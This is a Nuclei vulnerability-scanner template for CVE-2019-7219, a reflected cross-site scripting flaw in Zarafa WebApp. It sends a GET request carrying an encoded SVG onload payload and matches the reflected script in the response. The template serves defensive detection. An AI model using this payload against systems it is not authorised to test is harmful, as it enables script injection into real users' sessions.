nuclei-templates/cves/2019/CVE-2019-7219.yaml

27 lines
501 B
YAML

id: CVE-2019-7219
info:
name: Zarafa WebApp Reflected XSS
author: pd-team
severity: low
tags: cve,cve2019,zarafa,xss
requests:
- method: GET
path:
- '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=alert(xss)>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200